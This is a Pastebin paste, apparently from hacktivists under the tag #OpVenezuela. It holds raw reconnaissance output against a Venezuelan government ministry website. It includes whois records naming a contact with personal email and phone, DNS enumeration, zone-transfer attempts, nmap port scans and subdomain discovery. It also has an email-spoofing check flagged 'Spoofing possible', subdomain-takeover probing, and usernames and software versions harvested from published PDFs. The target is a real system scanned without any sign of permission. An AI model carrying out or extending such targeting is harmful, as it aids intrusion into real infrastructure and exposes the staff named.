Advertisement
Guest User

Anonymous JTSEC #OpVenezuela full Recon #3

a guest
Sep 1st, 2018
249
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 104.95 KB | None | 0 0
  1. #######################################################################################################################################
  2. Hostname www.minppibes.gob.ve ISP Fundación Centro Nacional de Innovación Tecnológica (CENIT)
  3. Continent South America Flag
  4. VE
  5. Country Venezuela Country Code VE
  6. Region Unknown Local time 01 Sep 2018 15:19 -04
  7. City Unknown Postal Code Unknown
  8. IP Address 150.188.25.46 Latitude 8
  9. Longitude -66
  10.  
  11. #######################################################################################################################################
  12. HostIP:150.188.25.46
  13. HostName:minppibes.gob.ve
  14.  
  15. Gathered Inet-whois information for 150.188.25.46
  16. ---------------------------------------------------------------------------------------------------------------------------------------
  17.  
  18.  
  19. inetnum: 150.179.0.0 - 150.203.255.255
  20. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  21. descr: IPv4 address block not managed by the RIPE NCC
  22. remarks: ------------------------------------------------------
  23. remarks:
  24. remarks: You can find the whois server to query, or the
  25. remarks: IANA registry to query on this web page:
  26. remarks: http://www.iana.org/assignments/ipv4-address-space
  27. remarks:
  28. remarks: You can access databases of other RIRs at:
  29. remarks:
  30. remarks: AFRINIC (Africa)
  31. remarks: http://www.afrinic.net/ whois.afrinic.net
  32. remarks:
  33. remarks: APNIC (Asia Pacific)
  34. remarks: http://www.apnic.net/ whois.apnic.net
  35. remarks:
  36. remarks: ARIN (Northern America)
  37. remarks: http://www.arin.net/ whois.arin.net
  38. remarks:
  39. remarks: LACNIC (Latin America and the Carribean)
  40. remarks: http://www.lacnic.net/ whois.lacnic.net
  41. remarks:
  42. remarks: IANA IPV4 Recovered Address Space
  43. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
  44. remarks:
  45. remarks: ------------------------------------------------------
  46. country: EU # Country is really world wide
  47. admin-c: IANA1-RIPE
  48. tech-c: IANA1-RIPE
  49. status: ALLOCATED UNSPECIFIED
  50. mnt-by: RIPE-NCC-HM-MNT
  51. mnt-lower: RIPE-NCC-HM-MNT
  52. mnt-routes: RIPE-NCC-RPSL-MNT
  53. created: 2011-07-11T12:35:52Z
  54. last-modified: 2015-10-29T15:13:45Z
  55. source: RIPE
  56.  
  57. role: Internet Assigned Numbers Authority
  58. address: see http://www.iana.org.
  59. admin-c: IANA1-RIPE
  60. tech-c: IANA1-RIPE
  61. nic-hdl: IANA1-RIPE
  62. remarks: For more information on IANA services
  63. remarks: go to IANA web site at http://www.iana.org.
  64. mnt-by: RIPE-NCC-MNT
  65. created: 1970-01-01T00:00:00Z
  66. last-modified: 2001-09-22T09:31:27Z
  67. source: RIPE # Filtered
  68.  
  69. % This query was served by the RIPE Database Query Service version 1.91.2 (BLAARKOP)
  70.  
  71.  
  72.  
  73. Gathered Inic-whois information for minppibes.gob.ve
  74. ---------------------------------------------------------------------------------------------------------------------------------------
  75.  
  76. Gathered Netcraft information for minppibes.gob.ve
  77. ---------------------------------------------------------------------------------------------------------------------------------------
  78.  
  79. Retrieving Netcraft.com information for minppibes.gob.ve
  80. Netcraft.com Information gathered
  81.  
  82. Gathered Subdomain information for minppibes.gob.ve
  83. ---------------------------------------------------------------------------------------------------------------------------------------
  84. Searching Google.com:80...
  85. HostName:www.minppibes.gob.ve
  86. HostIP:150.188.25.46
  87. HostName:correo.minppibes.gob.ve
  88. HostIP:150.188.25.48
  89. Searching Altavista.com:80...
  90. Found 2 possible subdomain(s) for host minppibes.gob.ve, Searched 0 pages containing 0 results
  91.  
  92. Gathered E-Mail information for minppibes.gob.ve
  93. ---------------------------------------------------------------------------------------------------------------------------------------
  94. Searching Google.com:80...
  95. Searching Altavista.com:80...
  96. Found 0 E-Mail(s) for host minppibes.gob.ve, Searched 0 pages containing 0 results
  97.  
  98. Gathered TCP Port information for 150.188.25.46
  99. ----------------------------------------------------------------------------------------------------------------------------------------
  100.  
  101. Port State
  102.  
  103. 80/tcp open
  104.  
  105. Portscan Finished: Scanned 150 ports, 0 ports were in state closed
  106.  
  107. #######################################################################################################################################
  108. [i] Scanning Site: http://minppibes.gob.ve
  109.  
  110.  
  111.  
  112. B A S I C I N F O
  113. =======================================================================================================================================
  114.  
  115.  
  116. [+] Site Title: MPP
  117. [+] IP address: 150.188.25.46
  118. [+] Web Server: Apache/2.4.10 (Debian)
  119. [+] CMS: Could Not Detect
  120. [+] Cloudflare: Not Detected
  121. [+] Robots File: Found
  122.  
  123. -------------[ contents ]----------------
  124. User-agent: *
  125. Disallow: /calendario/
  126. Disallow: /css/
  127. Disallow: /institucional/
  128. Allow: /web-final/
  129. Allow: /*.css$
  130. Allow: /*.js$
  131. -----------[end of contents]-------------
  132.  
  133.  
  134.  
  135. W H O I S L O O K U P
  136. =======================================================================================================================================
  137.  
  138.  
  139. Servidor Whois del Centro de Información de Red de Venezuela (NIC.VE)
  140.  
  141. Este servidor contiene información autoritativa exclusivamente de dominios .VE
  142. Cualquier consulta sobre este servicio, puede hacerla al correo electrónico whois@nic.ve
  143.  
  144. Titular:
  145. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas rcanabal@corpivensa.gob.ve/rafaelcanabal@gmail.com
  146. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas
  147. Av. Urdaneta, esquina de Ibarras a Pelota, edif: Central, piso 02
  148. Caracas, Distrito Capital VE
  149. 0212-5967800
  150.  
  151. Nombre de Dominio: minppibes.gob.ve
  152.  
  153. Contacto Administrativo:
  154. Rafael Canabal rcanabal@corpivensa.gob.ve/rafaelcanabal@gmail.com
  155. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas
  156. Av. Urdaneta, esquina de Ibarras a Pelota, edif: Central, piso 02
  157. Caracas, Distrito Capital VE
  158. 0212-5967800
  159.  
  160. Contacto Técnico:
  161. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas rcanabal@corpivensa.gob.ve/rafaelcanabal@gmail.com
  162. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas
  163. Av. Urdaneta, esquina de Ibarras a Pelota, edif: Central, piso 02
  164. Caracas, Distrito Capital VE
  165. 0212-5967800
  166.  
  167. Contacto de Cobranza:
  168. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas rcanabal@corpivensa.gob.ve/rafaelcanabal@gmail.com
  169. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas
  170. Av. Urdaneta, esquina de Ibarras a Pelota, edif: Central, piso 02
  171. Caracas, Distrito Capital VE
  172. 0212-5967800
  173.  
  174. Ultima Actualización: 2016-11-02 09:54:54
  175. Fecha de Creación: 2016-11-02 09:54:16
  176.  
  177. Estatus del dominio: ACTIVO
  178.  
  179. Servidor(es) de Nombres de Dominio:
  180.  
  181. - dns1.mppi.gob.ve
  182. - dns2.mppi.gob.ve
  183.  
  184. NIC-Venezuela - CONATEL
  185. http://www.nic.ve
  186.  
  187.  
  188.  
  189.  
  190. G E O I P L O O K U P
  191. =======================================================================================================================================
  192.  
  193. [i] IP Address: 150.188.25.46
  194. [i] Country: VE
  195. [i] State: Distrito Federal
  196. [i] City: Caracas
  197. [i] Latitude: 10.500000
  198. [i] Longitude: -66.916702
  199.  
  200.  
  201.  
  202.  
  203. H T T P H E A D E R S
  204. =======================================================================================================================================
  205.  
  206.  
  207. [i] HTTP/1.1 200 OK
  208. [i] Date: Sat, 01 Sep 2018 14:44:34 GMT
  209. [i] Server: Apache/2.4.10 (Debian)
  210. [i] Last-Modified: Tue, 07 Aug 2018 11:22:34 GMT
  211. [i] ETag: "894-572d69c47e55e"
  212. [i] Accept-Ranges: bytes
  213. [i] Content-Length: 2196
  214. [i] Vary: Accept-Encoding
  215. [i] Connection: close
  216. [i] Content-Type: text/html
  217.  
  218.  
  219.  
  220.  
  221. D N S L O O K U P
  222. =======================================================================================================================================
  223.  
  224. ;; Truncated, retrying in TCP mode.
  225. minppibes.gob.ve. 604800 IN A 150.188.25.46
  226. minppibes.gob.ve. 604800 IN SOA dns2.mppi.gob.ve. servidores.mppi.gob.ve. 2016111804 43200 7200 1209600 86400
  227. minppibes.gob.ve. 604800 IN NS dns1.mppi.gob.ve.
  228. minppibes.gob.ve. 604800 IN NS dns2.mppi.gob.ve.
  229. minppibes.gob.ve. 604800 IN MX 10 correo.minppibes.gob.ve.
  230. minppibes.gob.ve. 604800 IN TXT "v=spf1 mx ptr ~all"
  231.  
  232.  
  233.  
  234.  
  235. S U B N E T C A L C U L A T I O N
  236. =======================================================================================================================================
  237.  
  238. Address = 150.188.25.46
  239. Network = 150.188.25.46 / 32
  240. Netmask = 255.255.255.255
  241. Broadcast = not needed on Point-to-Point links
  242. Wildcard Mask = 0.0.0.0
  243. Hosts Bits = 0
  244. Max. Hosts = 1 (2^0 - 0)
  245. Host Range = { 150.188.25.46 - 150.188.25.46 }
  246.  
  247.  
  248.  
  249. N M A P P O R T S C A N
  250. =======================================================================================================================================
  251.  
  252.  
  253. Starting Nmap 7.40 ( https://nmap.org ) at 2018-09-01 19:26 UTC
  254. Nmap scan report for minppibes.gob.ve (150.188.25.46)
  255. Host is up (0.087s latency).
  256. PORT STATE SERVICE
  257. 21/tcp filtered ftp
  258. 22/tcp filtered ssh
  259. 23/tcp filtered telnet
  260. 80/tcp open http
  261. 110/tcp filtered pop3
  262. 143/tcp filtered imap
  263. 443/tcp filtered https
  264. 3389/tcp filtered ms-wbt-server
  265.  
  266. Nmap done: 1 IP address (1 host up) scanned in 5.09 seconds
  267.  
  268.  
  269.  
  270. S U B - D O M A I N F I N D E R
  271. =======================================================================================================================================
  272.  
  273.  
  274. [i] Total Subdomains Found : 1
  275.  
  276. [+] Subdomain: www.minppibes.gob.ve
  277. [-] IP: 150.188.25.46
  278.  
  279. #######################################################################################################################################
  280. \/ \/ \/
  281. [?] Enter the target: http://www.minppibes.gob.ve/
  282. [!] IP Address : 150.188.25.46
  283. [!] Server: Apache/2.4.10 (Debian)
  284. [+] Clickjacking protection is not in place.
  285. [+] Operating System : Debian
  286. [!] CMS Detected : WordPress
  287. [+] Honeypot Probabilty: 0%
  288. ---------------------------------------------------------------------------------------------------------------------------------------
  289. [~] Trying to gather whois information for www.minppibes.gob.ve
  290. [+] Whois information found
  291. [-] Unable to build response, visit https://who.is/whois/www.minppibes.gob.ve
  292. ---------------------------------------------------------------------------------------------------------------------------------------
  293. PORT STATE SERVICE
  294. 21/tcp filtered ftp
  295. 22/tcp filtered ssh
  296. 23/tcp filtered telnet
  297. 80/tcp open http
  298. 110/tcp filtered pop3
  299. 143/tcp filtered imap
  300. 443/tcp filtered https
  301. 3389/tcp filtered ms-wbt-server
  302. Nmap done: 1 IP address (1 host up) scanned in 6.87 seconds
  303. ---------------------------------------------------------------------------------------------------------------------------------------
  304. Unexpected status code from https://dnsdumpster.com/: 500
  305. #######################################################################################################################################
  306. [*] Performing General Enumeration of Domain: minppibes.gob.ve
  307. [-] DNSSEC is not configured for minppibes.gob.ve
  308. [*] SOA dns2.mppi.gob.ve 150.188.25.12
  309. [*] NS dns1.mppi.gob.ve 150.188.25.11
  310. [*] NS dns2.mppi.gob.ve 150.188.25.12
  311. [*] Bind Version for 150.188.25.12 4.6
  312. [*] MX correo.minppibes.gob.ve 150.188.25.48
  313. [*] A minppibes.gob.ve 150.188.25.46
  314. [*] TXT minppibes.gob.ve v=spf1 mx ptr ~all
  315. [*] Enumerating SRV Records
  316. [-] No SRV Records Found for minppibes.gob.ve
  317. [+] 0 Records Found
  318. #######################################################################################################################################
  319. Ip Address Status Type Domain Name Server
  320. ---------- ------ ---- ----------- ------
  321. 150.188.25.48 host correo.minppibes.gob.ve
  322. 150.188.25.11 host dns1.minppibes.gob.ve
  323. 150.188.25.12 host dns2.minppibes.gob.ve
  324. 150.188.25.48 alias imap.minppibes.gob.ve
  325. 150.188.25.48 host correo.minppibes.gob.ve
  326. 150.188.25.48 alias pop3.minppibes.gob.ve
  327. 150.188.25.48 host correo.minppibes.gob.ve
  328. 150.188.25.46 200 host prueba.minppibes.gob.ve Apache/2.4.10 (Debian)
  329. 150.188.25.48 alias smtp.minppibes.gob.ve
  330. 150.188.25.48 host correo.minppibes.gob.ve
  331. 150.188.25.46 200 host www.minppibes.gob.ve Apache/2.4.10 (Debian)
  332. #######################################################################################################################################
  333. Original* minppibes.gob.ve 150.188.25.46 NS:dns1.mppi.gob.ve MX:correo.minppibes.gob.ve
  334. #######################################################################################################################################
  335. dnsenum VERSION:1.2.4
  336.  
  337. ----- minppibes.gob.ve -----
  338.  
  339.  
  340. Host's addresses:
  341. __________________
  342.  
  343. minppibes.gob.ve. 604709 IN A 150.188.25.46
  344.  
  345.  
  346. Name Servers:
  347. ______________
  348.  
  349. dns1.mppi.gob.ve. 604800 IN A 150.188.25.11
  350. dns2.mppi.gob.ve. 604800 IN A 150.188.25.12
  351.  
  352.  
  353. Mail (MX) Servers:
  354. ___________________
  355.  
  356. correo.minppibes.gob.ve. 604800 IN A 150.188.25.48
  357.  
  358.  
  359. Trying Zone Transfers and getting Bind Versions:
  360. _________________________________________________
  361.  
  362.  
  363. Trying Zone Transfer for minppibes.gob.ve on dns1.mppi.gob.ve ...
  364.  
  365. Trying Zone Transfer for minppibes.gob.ve on dns2.mppi.gob.ve ...
  366.  
  367. brute force file not specified, bay.
  368. #######################################################################################################################################
  369. Servidor Whois del Centro de Información de Red de Venezuela (NIC.VE)
  370.  
  371. Este servidor contiene información autoritativa exclusivamente de dominios .VE
  372. Cualquier consulta sobre este servicio, puede hacerla al correo electrónico whois@nic.ve
  373.  
  374. Titular:
  375. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas rcanabal@corpivensa.gob.ve/rafaelcanabal@gmail.com
  376. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas
  377. Av. Urdaneta, esquina de Ibarras a Pelota, edif: Central, piso 02
  378. Caracas, Distrito Capital VE
  379. 0212-5967800
  380.  
  381. Nombre de Dominio: minppibes.gob.ve
  382.  
  383. Contacto Administrativo:
  384. Rafael Canabal rcanabal@corpivensa.gob.ve/rafaelcanabal@gmail.com
  385. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas
  386. Av. Urdaneta, esquina de Ibarras a Pelota, edif: Central, piso 02
  387. Caracas, Distrito Capital VE
  388. 0212-5967800
  389.  
  390. Contacto Técnico:
  391. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas rcanabal@corpivensa.gob.ve/rafaelcanabal@gmail.com
  392. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas
  393. Av. Urdaneta, esquina de Ibarras a Pelota, edif: Central, piso 02
  394. Caracas, Distrito Capital VE
  395. 0212-5967800
  396.  
  397. Contacto de Cobranza:
  398. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas rcanabal@corpivensa.gob.ve/rafaelcanabal@gmail.com
  399. Ministerio del Poder Popular de Industrias Basicas, Estrategicas y Socialistas
  400. Av. Urdaneta, esquina de Ibarras a Pelota, edif: Central, piso 02
  401. Caracas, Distrito Capital VE
  402. 0212-5967800
  403.  
  404. Ultima Actualización: 2016-11-02 09:54:54
  405. Fecha de Creación: 2016-11-02 09:54:16
  406.  
  407. Estatus del dominio: ACTIVO
  408.  
  409. Servidor(es) de Nombres de Dominio:
  410.  
  411. - dns1.mppi.gob.ve
  412. - dns2.mppi.gob.ve
  413.  
  414. NIC-Venezuela - CONATEL
  415. http://www.nic.ve
  416. #######################################################################################################################################
  417. [-] Enumerating subdomains now for minppibes.gob.ve
  418. [-] verbosity is enabled, will show the subdomains results in realtime
  419. [-] Searching now in Baidu..
  420. [-] Searching now in Yahoo..
  421. [-] Searching now in Google..
  422. [-] Searching now in Bing..
  423. [-] Searching now in Ask..
  424. [-] Searching now in Netcraft..
  425. [-] Searching now in DNSdumpster..
  426. [-] Searching now in Virustotal..
  427. [-] Searching now in ThreatCrowd..
  428. [-] Searching now in SSL Certificates..
  429. [-] Searching now in PassiveDNS..
  430. ThreatCrowd: www.minppibes.gob.ve
  431. Virustotal: www.minppibes.gob.ve
  432. Virustotal: correo.minppibes.gob.ve
  433. Yahoo: www.minppibes.gob.ve
  434. Yahoo: correo.minppibes.gob.ve
  435. Google: correo.minppibes.gob.ve
  436. [-] Saving results to file: /usr/share/sniper/loot/minppibes.gob.ve/domains/domains-minppibes.gob.ve.txt
  437. [-] Total Unique Subdomains Found: 2
  438. www.minppibes.gob.ve
  439. correo.minppibes.gob.ve
  440. #######################################################################################################################################
  441. [*] Found SPF record:
  442. [*] v=spf1 mx ptr ~all
  443. [*] SPF record contains an All item: ~all
  444. [*] No DMARC record found. Looking for organizational record
  445. [+] No organizational DMARC record
  446. [+] Spoofing possible for minppibes.gob.ve!
  447. #######################################################################################################################################
  448. __
  449. ____ _____ ___ ______ _/ /_____ ____ ___
  450. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  451. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  452. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  453. /_/ discover v0.5.0 - by @michenriksen
  454.  
  455. Identifying nameservers for minppibes.gob.ve... Done
  456. Using nameservers:
  457.  
  458. - 150.188.25.11
  459. - 150.188.25.12
  460.  
  461. Checking for wildcard DNS... Done
  462.  
  463. Running collector: Wayback Machine... Done (3 hosts)
  464. Running collector: Google Transparency Report... Done (0 hosts)
  465. Running collector: PassiveTotal... Skipped
  466. -> Key 'passivetotal_key' has not been set
  467. Running collector: DNSDB... Error
  468. -> DNSDB returned unexpected response code: 503
  469. Running collector: Dictionary... Done (22 hosts)
  470. Running collector: Censys... Skipped
  471. -> Key 'censys_secret' has not been set
  472. Running collector: HackerTarget... Done (2 hosts)
  473. Running collector: PTRArchive... Error
  474. -> PTRArchive returned unexpected response code: 502
  475. Running collector: Riddler... Skipped
  476. -> Key 'riddler_username' has not been set
  477. Running collector: Certificate Search... Done (0 hosts)
  478. Running collector: VirusTotal... Skipped
  479. -> Key 'virustotal' has not been set
  480. Running collector: Netcraft... Done (0 hosts)
  481. Running collector: Threat Crowd... Done (1 host)
  482. Running collector: PublicWWW... Done (0 hosts)
  483. Running collector: Shodan... Skipped
  484. -> Key 'shodan' has not been set
  485.  
  486. Resolving 25 unique hosts...
  487. 150.188.25.46 .minppibes.gob.ve
  488. 150.188.25.48 correo.minppibes.gob.ve
  489. 150.188.25.46 minppibes.gob.ve
  490. 150.188.25.46 www.minppibes.gob.ve
  491.  
  492. Found subnets:
  493.  
  494. - 150.188.25.0-255 : 4 hosts
  495.  
  496. Wrote 4 hosts to:
  497.  
  498. - file:///root/aquatone/minppibes.gob.ve/hosts.txt
  499. - file:///root/aquatone/minppibes.gob.ve/hosts.json
  500. __
  501. ____ _____ ___ ______ _/ /_____ ____ ___
  502. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  503. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  504. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  505. /_/ takeover v0.5.0 - by @michenriksen
  506.  
  507. Loaded 4 hosts from /root/aquatone/minppibes.gob.ve/hosts.json
  508. Loaded 25 domain takeover detectors
  509.  
  510. Identifying nameservers for minppibes.gob.ve... Done
  511. Using nameservers:
  512.  
  513. - 150.188.25.11
  514. - 150.188.25.12
  515.  
  516. Checking hosts for domain takeover vulnerabilities...
  517.  
  518. Finished checking hosts:
  519.  
  520. - Vulnerable : 0
  521. - Not Vulnerable : 4
  522.  
  523. Wrote 0 potential subdomain takeovers to:
  524.  
  525. - file:///root/aquatone/minppibes.gob.ve/takeovers.json
  526.  
  527. __
  528. ____ _____ ___ ______ _/ /_____ ____ ___
  529. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  530. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  531. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  532. /_/ scan v0.5.0 - by @michenriksen
  533.  
  534. Loaded 4 hosts from /root/aquatone/minppibes.gob.ve/hosts.json
  535.  
  536. Probing 4 ports...
  537. 443/tcp 150.188.25.48 correo.minppibes.gob.ve
  538.  
  539. Wrote open ports to file:///root/aquatone/minppibes.gob.ve/open_ports.txt
  540. Wrote URLs to file:///root/aquatone/minppibes.gob.ve/urls.txt
  541. __
  542. ____ _____ ___ ______ _/ /_____ ____ ___
  543. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  544. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  545. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  546. /_/ gather v0.5.0 - by @michenriksen
  547.  
  548. Processing 1 pages...
  549.  
  550. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
  551. #######################################################################################################################################
  552. INFO[0000] Starting to process queue....
  553. INFO[0000] Starting to process permutations....
  554. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  555. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  556. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  557. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  558. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  559. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  560. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  561. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  562. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  563. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  564. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  565. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  566. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  567. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  568. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  569. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  570. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  571. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  572. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  573. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  574. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  575. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  576. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  577. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  578. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  579. ERRO[0000] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  580. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  581. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  582. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.97.203:80: getsockopt: connection refused
  583. #######################################################################################################################################
  584. ---------------------------------------------------------------------------------------------------------------------------------------
  585.  
  586. Total hosts: 6
  587.  
  588. [-] Resolving hostnames IPs...
  589.  
  590. 253Dcorreo.minppibes.gob.ve : empty
  591. correo.minppibes.gob.ve : 150.188.25.48
  592. www.minppibes.gob.ve : 150.188.25.46
  593.  
  594. [+] Virtual hosts:
  595. ---------------------------------------------------------------------------------------------------------------------------------------
  596. #######################################################################################################################################
  597. ---------------------------------------------------------------------------------------------------------------------------------------
  598. [2/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Aregchat.pdf
  599. [3/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_030.pdf
  600. [x] Error in the parsing process
  601. [4/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_035.pdf
  602. [5/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_044.pdf
  603. [6/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_043.pdf
  604. [7/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_038.pdf
  605. [8/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_005.pdf
  606. [9/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_041.pdf
  607. [10/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_032.pdf
  608. [11/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Manifiesto/Manifiesto_de_la_clase_Trabajadora_del_MinPPIBES.pdf
  609. [12/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_027.pdf
  610. [13/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_045.pdf
  611. [14/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_037.pdf
  612. [15/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_039.pdf
  613. [16/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_013.pdf
  614. [17/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_007.pdf
  615. [18/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_042.pdf
  616. [19/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_029.pdf
  617. [20/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Boletines/Boletin.pdf
  618. [21/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_034.pdf
  619. [22/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_036.pdf
  620. [23/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_028.pdf
  621. [24/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_015.pdf
  622. [25/25] http://www.minppibes.gob.ve/web-final/Doc/pdf/Revistas_Clap/Revista_CLAP_006.pdf
  623. #######################################################################################################################################
  624.  
  625. [+] List of users found:
  626. ---------------------------------------------------------------------------------------------------------------------------------------
  627. ��usuario
  628. Revista
  629. mperez
  630. User01
  631. #######################################################################################################################################
  632. [+] List of software found:
  633. ---------------------------------------------------------------------------------------------------------------------------------------
  634. ��LibreOffice 4.3
  635. ��Impress
  636. Adobe PDF Library 15.0
  637. Adobe InDesign CC 2017 (Macintosh)
  638. Adobe InDesign CC 2015 (Macintosh)
  639. ��LibreOffice 4.1
  640. ��Writer
  641. Acrobat Distiller 15.0 (Macintosh)
  642. cairo 1.14.8 (http://cairographics.org)
  643. Microsoft Excel
  644.  
  645. [+] List of paths and servers found:
  646. ---------------------------------------------------------------------------------------------------------------------------------------
  647. #######################################################################################################################################
  648. [+] List of e-mails found:
  649. --------------------------------------------------------------------------------------------------------------------------------------
  650. lap2016@gma
  651. l2016@gma
  652. lap2016@gma
  653. l2016@gma
  654. lap2016@gma
  655. l2016@gma
  656. lap2016@gma
  657. l2016@gma
  658. lap2016@gma
  659. l2016@gma
  660. lap2016@gma
  661. l2016@gma
  662. lap2016@gma
  663. l2016@gma
  664. lap2016@gma
  665. l2016@gma
  666. lap2016@gma
  667. l2016@gma
  668. lap2016@gma
  669. l2016@gma
  670. lap2016@gma
  671. l2016@gma
  672. lap2016@gma
  673. l2016@gma
  674. lap2016@gma
  675. l2016@gma
  676. lap2016@gma
  677. l2016@gma
  678. lap2016@gma
  679. l2016@gma
  680. lap2016@gma
  681. l2016@gma
  682. #######################################################################################################################################
  683. Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-01 20:45 EDT
  684. Nmap scan report for minppibes.gob.ve (150.188.25.46)
  685. Host is up (0.75s latency).
  686. Not shown: 440 closed ports, 35 filtered ports
  687. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  688. PORT STATE SERVICE
  689. 80/tcp open http
  690. #######################################################################################################################################
  691. Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-01 20:45 EDT
  692. Nmap scan report for minppibes.gob.ve (150.188.25.46)
  693. Host is up.
  694.  
